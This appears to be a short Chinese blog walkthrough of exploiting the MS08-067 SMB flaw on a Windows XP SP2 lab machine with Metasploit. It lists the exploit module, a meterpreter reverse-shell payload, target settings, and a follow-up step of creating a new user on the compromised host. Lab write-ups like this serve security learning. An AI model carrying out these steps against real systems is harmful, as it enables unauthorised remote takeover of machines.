Metasploit利用MS08-067漏洞

环境

攻击机器：ubuntu 18.04
被攻击机器：windows xp sp2

可能使用的工具

metasploit
nessus
nmap等

正文

首先搭建所需要的靶机环境和安装所有可能使用到的工具，接着使用类似nessus等工具扫描目标网段。以下是扫描结果，靶机的IP是192.168.1.166

发现这个没有打补丁的靶机存在很多的漏洞，本篇博文利用的是MS08-067.ms08_067漏洞是的著名远程溢出漏洞，它的影响范围非常大，当然在老系统中。

1. 使用命令msfconsole进入metasploit控制台
2. 使用命令search ms08-067搜索MS08-067可利用的exploit
   
3. 使用命令use exploit/windows/smb/ms08_067_netapi选择exploit
4. 使用命令show options查看配置选项
   
5. 使用命令show payloads查看所有可以利用的payload
   
6. 使用set命令设置payloadset payload windows/meterpreter/rever
7. 设置所有的必选的参数，其中攻击机的IP为192.168.1.181，被攻击机器IP为192.168.1.166
   
   其中的target的值为10代表目标机器的操作系统为windows xp sp2 简体中文版
   
   操作系统的确定可以使用nmap -O
   
8. 使用命令run运行
   
9. 后继操作
   后继的操作就很好玩了，比如创建一个新的用户
   
   结束。